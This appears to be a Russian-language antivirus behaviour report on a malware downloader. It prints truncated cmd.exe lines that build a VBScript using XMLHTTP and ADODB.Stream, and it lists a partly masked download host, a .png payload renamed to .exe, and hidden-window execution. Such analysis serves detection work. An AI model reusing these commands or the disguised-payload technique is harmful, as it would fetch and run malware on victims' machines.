Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c cd "%appdata%" &echo Dim drgfgd, jhgfsf >> 5gv.vbs &echo Set drgfgd = CreateObject("Microsoft.XMLHTTP")>> 5gv.vbs &echo Set jhgfsf = CreateObject("Adodb.Stream")>> 5gv.vbs &echo drgfgd.Open ...
- '<SYSTEM32>\cmd.exe' /c echo 4251 & ping localhost & cd "%appdata%" & echo drgfgd.Send>> 5gv.vbs &echo With jhgfsf>> 5gv.vbs &echo .Type = ^1>> 5gv.vbs &echo .Open>> 5gv.vbs & echo .write drgfgd.responseb...
Изменения в файловой системе
Создает следующие файлы
- <Текущая директория>\oo.txt
- %APPDATA%\5gv.vbs
- %APPDATA%\lkgs.png
Удаляет следующие файлы
- %APPDATA%\5gv.vbs
Перемещает следующие файлы
- %APPDATA%\lkgs.png в %APPDATA%\lkgs.exe
Сетевая активность
Подключается к
- 'di##.#arelia.pro':80
TCP
Запросы HTTP GET
- http://di##.#arelia.pro/kHed3uD/906.png
UDP
- DNS ASK di##.#arelia.pro
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%APPDATA%\5gv.vbs"
- '<SYSTEM32>\cmd.exe' /c echo 4251 & ping localhost & cd "%appdata%" & echo drgfgd.Send>> 5gv.vbs &echo With jhgfsf>> 5gv.vbs &echo .Type = ^1>> 5gv.vbs &echo .Open>> 5gv.vbs & echo .write drgfgd.responseb...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c cd "%appdata%" &echo Dim drgfgd, jhgfsf >> 5gv.vbs &echo Set drgfgd = CreateObject("Microsoft.XMLHTTP")>> 5gv.vbs &echo Set jhgfsf = CreateObject("Adodb.Stream")>> 5gv.vbs &echo drgfgd.Open ...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\ping.exe' localhost
- '<SYSTEM32>\ping.exe' localhost -n 5
